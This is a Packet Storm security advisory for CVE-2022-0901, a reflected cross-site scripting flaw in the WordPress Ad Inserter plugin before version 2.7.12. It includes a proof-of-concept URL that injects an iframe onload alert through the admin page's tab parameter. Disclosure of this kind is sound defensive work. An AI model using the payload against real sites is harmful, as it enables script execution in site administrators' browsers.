WordPress Ad Inserter versions prior to 2.7.12 suffer from a cross site scripting vulnerability.
652db37affa3855340a258c91864a0ce8bdaf34f00f77d2ce010c203c6c62a77Tittle:
WordPress Plugin Ad Inserter < 2.7.12 - Reflected Cross-Site Scripting
References:
CVE-2022-0901
Author:
Taurus Omar
Description:
The plugins do not sanitise and escape the REQUEST_URI before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters
Affects Plugins:
ad-inserter
ad-inserter-pro
Fixed in version 2.7.12
Proof of Concept:
In a browser which does not encode characters:
https://example.com/wp-admin/options-general.php?page=ad-inserter.php&start=2&tab=\"><iframe/onload=alert(1)></iframe>
Classification
Type XSS
OWASP top 10 A7: Cross-Site Scripting (XSS)
CWE-79
wpScan:
https://wpscan.com/vulnerability/85582b4f-a40a-4394-9834-0c88c5dc57ba
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed